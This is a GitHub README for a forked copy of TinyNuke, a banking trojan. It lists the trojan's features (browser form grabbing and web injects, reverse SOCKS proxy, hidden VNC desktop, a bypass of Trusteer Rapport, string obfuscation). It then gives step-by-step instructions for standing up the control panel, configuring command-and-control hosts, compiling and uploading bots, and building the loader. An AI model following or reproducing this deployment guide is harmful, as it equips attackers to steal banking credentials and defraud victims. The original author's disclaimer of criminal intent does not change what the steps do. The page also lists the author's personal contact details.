/TinyNuke

zeus-style banking trojan

Primary LanguageC++

NOTE

This repo is a fork of one which has since been deleted by its author. I didn't write the code, but find it useful (hence, forked it). I don't offer support for it, but don't plan to delete it either.

Original README follows:


This repository contains the source code of TinyNuke which is a zeus-style trojan written by me.

Trusteer Rapport News:

In a tabloid-like article (https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/) IBM claims I never bypassed Trusteer without sources or proof while spewing lies about me. Here is a little video to counter that statement: https://www.youtube.com/watch?v=co7T9CHxYZw I had offered to help trusteer try to fix this problem weeks ago but they didn't seem to want any help as I was stuck with tech support more centered for customers of their software then technical stuff.

You can see how easy it is to beat trusteer which makes 147m USD a year here: https://github.com/aainz/TinyNuke/blob/master/Utils.cpp#L524

Disclaimor:

Some articles are claiming that I am a certain individual selling this bot on russian underground forums

  • I am not russian neither do I speak the language even though I greatly appreciate russians and their culture
  • This repository is published under my real name

I also never infected anything with this project nor did I sell it or try to

Main Features:

  • Formgrabber and Webinjects for Firefox, Internet Explorer and Chrome. Can inject x86 as well as x64 browsers.
  • Reverse SOCKS 4
  • HVNC like Hidden Desktop
  • Trusteer Bypass
  • ~32kb binary with obfuscated strings ~20kb without

Installation:

  • To install the panel dump the db.sql file then login with the default panel credentials admin:pass and finally navigate to settings.php (Panel does not support php running under CGI/FastCGI. You also need at least php version 5.4)

  • Open TinyNuke.sln and provide your server Api.cpp like this:

    Strs::host[0] = ENC_STR_A"127.0.0.1"END_ENC_STR; Strs::host[1] = ENC_STR_A"backup-server"END_ENC_STR; Strs::host[2] = 0;

    To obfuscate strings between the ENC_STR_A and END_ENC_STR, backup Api.cpp then use the AutoEncrypt project, a binary is located in the root directory

  • Compile the Bot project for the x64 and x86 platforms and upload the binaries to the panel in the settings page

  • Upload your webinject file, format can be seen in private/injects.json in the panel folder if you have no webinjects provide an empty JSON object "{}"

  • Compile the Loader project to get your PE file

Usage and additional info can be found within the code (HiddenDesktop/VNC server folder = HiddenDesktop, Reverse SOCKS 4 server = SocksServer)

Known Bugs:

  • The "Top Hosts" feature was hacked together and should either be fixed or more probably removed.

Note: you can contact me at augustin@inzirillo.com by email or at aainz@exploit.im on jabber (I will not help you commit crime)